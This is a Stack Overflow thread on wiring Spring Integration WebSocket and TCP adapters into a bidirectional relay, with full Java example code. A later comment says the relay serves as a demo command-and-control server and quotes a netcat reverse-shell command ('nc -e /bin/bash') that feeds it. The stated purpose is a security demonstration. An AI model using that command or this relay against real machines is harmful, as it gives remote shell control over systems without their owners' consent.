# Using Spring Integration DSL, how do I configure I/O between different integrations?

Tags: java, spring-boot, spring-integration, spring-integration-dsl

I have a Spring Boot application, and I'm trying to connect two different Spring Integration services together.  I have a WebSocket listener, and a TCP listener defined using the available DSL examples for those two integrations.

However, I have been unable to find documentation on how to bridge them together.  In other words, when a WebSocket connection is opened by a browser client, and an incoming TCP connection is accepted from another system, I simply want to blindly pass all input and output from one to the other, in a bidirectional capacity.  Think of it as a simple telnet bridge between two protocols, using my Spring Boot app as a bridge.

It seems like this sort of direct linking should be very simple with the Spring Integration DSL, but I can't even find an example of bridging multiple connections even with the annotation interface.  Whenever I send a message from either interface, I see a "Dispatcher has no subscribers" error.

Am I overcomplicating this, or do I need to write some business logic code to do bidirectional forwarding?

Comment: For now, I'm intentionally ignoring how to deal with multiple concurrent clients.  I'd be happy at this point with singleton connections (i.e. incoming client closes any existing clients) or to simply broadcast any message to everyone.

Answer (score 5):

Here is a simple TCP<->TCP bridge...

```java
@SpringBootApplication
public class So66993561Application {

    public static void main(String[] args) {
        SpringApplication.run(So66993561Application.class, args);
    }

    @Bean
    AbstractServerConnectionFactory server() {
        return Tcp.netServer(1234)
                .deserializer(TcpCodecs.lf())
                .serializer(TcpCodecs.lf())
                .get();
    }

    @Bean
    AbstractClientConnectionFactory client() {
        return Tcp.netClient("localhost", 1235)
                .deserializer(TcpCodecs.lf())
                .serializer(TcpCodecs.lf())
                .get();
    }

    @Bean
    IntegrationFlow serverInbound(AbstractServerConnectionFactory server) {
        return IntegrationFlows.from(Tcp.inboundAdapter(server))
                .transform(Transformers.objectToString())
                .handle("service", "sendToNCL")
                .get();
    }

    @Bean
    IntegrationFlow serverOutbound(AbstractServerConnectionFactory server) {
        return IntegrationFlows.from(ServerGateway.class)
                .handle(Tcp.outboundAdapter(server))
                .get();
    }

    @Bean
    IntegrationFlow clientInbound(AbstractClientConnectionFactory client) {
        return IntegrationFlows.from(Tcp.inboundAdapter(client))
                .transform(Transformers.objectToString())
                .handle("service", "broadcastToClients")
                .get();
    }

    @Bean
    IntegrationFlow clientOutbound(AbstractClientConnectionFactory client) {
        return IntegrationFlows.from(ClientGateway.class)
                .handle(Tcp.outboundAdapter(client))
                .get();
    }

    @Bean
    @DependsOn("clientOutbound")
    public ApplicationRunner runner(AbstractClientConnectionFactory client) {
        return args -> {
            System.out.println("Hit enter when netcat is running");
            System.in.read(); // nc -l 1235
            client.getConnection(); // just open the connection.
        };
    }

}

interface ServerGateway {

    @Gateway(payloadExpression = "#args[0]",
            headers = @GatewayHeader(name = IpHeaders.CONNECTION_ID, expression = "#args[1]" ))
    void send(String out, String connectionId);

}

interface ClientGateway {

    void send(String out);

}

@Component
@DependsOn({ "clientOutbound", "serverOutbound" })
class Service {

    private final Set<String> serverClients = ConcurrentHashMap.newKeySet();

    private final ClientGateway client;

    private final ServerGateway server;

    private volatile boolean clientOpen;

    public Service(ClientGateway client, ServerGateway server) {
        this.client = client;
        this.server = server;
    }

    public void broadcastToClients(String in) {
        System.out.println("received from server: " + in);
        this.serverClients.forEach(client -> {
            try {
                this.server.send(in, client);
            }
            catch (Exception e) {
                e.printStackTrace();
            }
        });
    }

    public void sendToNCL(String in) {
        System.out.println("received from a client: " + in);
        if (this.clientOpen) {
            try {
                this.client.send(in);
            }
            catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    @EventListener
    public void opens(TcpConnectionOpenEvent event) {
        System.out.println(event);
        if (event.getConnectionFactoryName().equals("server")) {
            this.serverClients.add(event.getConnectionId());
        }
        else {
            this.clientOpen = true;
        }
    }

    @EventListener
    public void closes(TcpConnectionCloseEvent event) {
        System.out.println(event);
        this.serverClients.remove(event.getConnectionId());
        if (event.getConnectionFactoryName().equals("client")) {
            this.clientOpen = false;
        }
    }

}
```

```
$ nc -l 1235
foo <<<<<<<<<<<<<<<<< received
bar <<<<<<<<<<<<<<<<< sent
```

```
$ nc localhost 1234
foo <<<<<<<<<<<<<<<<< sent
bar <<<<<<<<<<<<<<<<< received
```

**EDIT**

Adding websocket server...

```java
@SpringBootApplication
public class So66993561Application {

    public static void main(String[] args) {
        SpringApplication.run(So66993561Application.class, args);
    }

    @Bean
    AbstractServerConnectionFactory server() {
        return Tcp.netServer(1234)
                .deserializer(TcpCodecs.lf())
                .serializer(TcpCodecs.lf())
                .get();
    }

    @Bean
    AbstractClientConnectionFactory client() {
        return Tcp.netClient("localhost", 1235)
                .deserializer(TcpCodecs.lf())
                .serializer(TcpCodecs.lf())
                .get();
    }

    @Bean
    IntegrationFlow serverInbound(AbstractServerConnectionFactory server) {
        return IntegrationFlows.from(Tcp.inboundAdapter(server))
                .transform(Transformers.objectToString())
                .handle("service", "sendToNCL")
                .get();
    }

    @Bean
    IntegrationFlow serverOutbound(AbstractServerConnectionFactory server) {
        return IntegrationFlows.from(ServerGateway.class)
                .handle(Tcp.outboundAdapter(server))
                .get();
    }

    @Bean
    IntegrationFlow clientInbound(AbstractClientConnectionFactory client) {
        return IntegrationFlows.from(Tcp.inboundAdapter(client))
                .transform(Transformers.objectToString())
                .handle("service", "broadcastToClients")
                .get();
    }

    @Bean
    IntegrationFlow clientOutbound(AbstractClientConnectionFactory client) {
        return IntegrationFlows.from(ClientGateway.class)
                .handle(Tcp.outboundAdapter(client))
                .get();
    }

    @Bean
    @DependsOn("clientOutbound")
    ApplicationRunner runner(AbstractClientConnectionFactory client) {
        return args -> {
            System.out.println("Hit enter when netcat is running");
            System.in.read(); // nc -l 1235
            client.getConnection(); // just open the connection.
        };
    }

    @Bean
    ServerWebSocketContainer serverWebSocketContainer() {
        return new ServerWebSocketContainer("/relay").withSockJs();
    }

    @Bean
    MessageHandler webSocketOutboundAdapter(ServerWebSocketContainer container) {
        return new WebSocketOutboundMessageHandler(container);
    }

    @Bean
    WebSocketInboundChannelAdapter wsInboundAdapter(ServerWebSocketContainer container) {
        return new WebSocketInboundChannelAdapter(container);
    }

    @Bean
    IntegrationFlow wsInbound(WebSocketInboundChannelAdapter wsInboundAdapter) {
        return IntegrationFlows.from(wsInboundAdapter)
                .handle("service", "sendToNCL")
                .get();
    }

    @Bean
    public IntegrationFlow wsOutbound(MessageHandler webSocketOutboundAdapter) {
        return IntegrationFlows.from(WsServerGateway.class)
                .handle(webSocketOutboundAdapter)
                .get();
    }

}

interface ServerGateway {

    @Gateway(payloadExpression = "#args[0]",
            headers = @GatewayHeader(name = IpHeaders.CONNECTION_ID, expression = "#args[1]" ))
    void send(String out, String sessionId);

}

interface ClientGateway {

    void send(String out);

}

interface WsServerGateway {

    @Gateway(payloadExpression = "#args[0]",
            headers = @GatewayHeader(name = SimpMessageHeaderAccessor.SESSION_ID_HEADER, expression = "#args[1]" ))
    void send(String out, String connectionId);

}

@Component
@DependsOn({ "clientOutbound", "serverOutbound", "wsOutbound" })
class Service {

    private final Set<String> serverClients = ConcurrentHashMap.newKeySet();

    private final ClientGateway client;

    private final ServerGateway server;

    private final WsServerGateway wsServer;

    private final ServerWebSocketContainer wsContainer;

    private volatile boolean clientOpen;

    public Service(ClientGateway client, ServerGateway server, WsServerGateway wsServer,
            ServerWebSocketContainer wsContainer) {

        this.client = client;
        this.server = server;
        this.wsServer = wsServer;
        this.wsContainer = wsContainer;
    }

    public void broadcastToClients(String in) {
        System.out.println("received from server: " + in);
        this.serverClients.forEach(client -> {
            try {
                this.server.send(in, client);
            }
            catch (Exception e) {
                e.printStackTrace();
            }
        });
        this.wsContainer.getSessions().keySet().forEach(session -> this.wsServer.send(in, session));
    }

    public void sendToNCL(String in) {
        System.out.println("received from a client: " + in);
        if (this.clientOpen) {
            try {
                this.client.send(in);
            }
            catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    @EventListener
    public void opens(TcpConnectionOpenEvent event) {
        System.out.println(event);
        if (event.getConnectionFactoryName().equals("server")) {
            this.serverClients.add(event.getConnectionId());
        }
        else {
            this.clientOpen = true;
        }
    }

    @EventListener
    public void closes(TcpConnectionCloseEvent event) {
        System.out.println(event);
        this.serverClients.remove(event.getConnectionId());
        if (event.getConnectionFactoryName().equals("client")) {
            this.clientOpen = false;
        }
    }

}
```

```
$ websocat ws://localhost:8080/relay/websocket
foo <<<<<<<<<<<<<<<< received from nc -l connection
baz <<<<<<<<<<<<<<<< sent to nc -l connection
```

Comment: Thank you Gary!  This helps quite a bit on the TCP side.  However, the WebSocket and TCP integration examples don't seem to have consistent interfaces involved.  I can connect a websocket from the browser, and I can connect a TCP client from netcat, but linking them together like the TCP client above doesn't seem to work.  I'm probably just not understanding all the Bean magic involved (coming from an embedded C/C++ background here!).  What is the actual abstraction that routes the Messages between interfaces?

Comment: It should be a simple as replacing the server side pair of TCP channel adapters with the websocket equivalent. https://docs.spring.io/spring-integration/docs/current/reference/html/web-sockets.html#web-sockets You just need to use the websocket session id instead of the tcp connection id header to determine the session(s) to send to. If you can't figure it out, I'll try to find some time.

Comment: I added a web socket server to my example.

Answer (score 0):

See https://github.com/spring-projects/spring-integration/blob/main/spring-integration-websocket/src/test/java/org/springframework/integration/websocket/server/WebSocketServerTests.java for a sample how to configure WebScoket components.

Since you talk about a browser connection, you probably need a `ServerConfig` part to accept connections and forward messages to some `webSocketInputChannel`.

The `TcpSendingMessageHandler` could be a subscriber to that channel to bridge the data into a target TCP/IP connection.

A `TcpReceivingChannelAdapter` with the same `TcpNetClientConnectionFactory` could be used to receive a data from a TCP/IP connection and sends it to the `webSocketOutputChannel` for forwarding to the WebSocket session.

Keep in mind though, that `simpSessionId` header need to be transferred from the WebSocket request message to the TCP package and back for the future correlation when you are going to receive messages from TCP. Since there is no headers notation in TCP, you would need to think about some sort of data wrapper to embed headers alongside with the payload into TCP/IP package.

See more info about async collaborating channel adapters in docs:
https://docs.spring.io/spring-integration/reference/html/ip.html#ip-collaborating-adapters. And the next section about transferring headers.

This sample also provides some useful info about correlation and multiplexing with TCP/IP channel adapters: https://github.com/spring-projects/spring-integration-samples/tree/main/intermediate/tcp-client-server-multiplex

Comment: In this case, the TCP connection will need to be a raw I/O pipe, for example, to a bash shell.  The idea is to be able to send commands to the remote system via the websocket from the browser and display any response.  If there's no current TCP connection, nothing happens.  But if a remote system is connected to a TCP socket, it will forward the bytes and relay the response.

Comment: I need to understand more about your TCP side, but right no it sounds even more simpler, than I described above: you just need a `TcpOutboundGateway` to relay command to the remote TCP server and wait for replies.

Comment: This is for a security demo app.  It's a 'fake' command&control server to illustrate supply chain and remote command execution vulnerabilities. 
The TCP side listens for an incoming connection from netcat (i.e. nc -e /bin/bash <host> <port>).  Once connected, I'm able to demonstrate that I can execute shell commands through this TCP connection.  In my existing demo, I just use a local netcat listener.
The websocket is so that I can issue commands from the browser.  I just need everything sent to the websocket to be relayed through the TCP connections, and vice versa.

Comment: TcpOutboundGateway appears to wait for a response, but will it forward all of the lines of a command response, like 'ls'?
In either case the main question is that I don't understand from existing examples how to wire the WebSocket and the TCP Gateway together.  This would be trivial with Streams, so it seems like I just don't understand the API enough.

Comment: I answered with a TCP<->TCP bridge - hope that helps.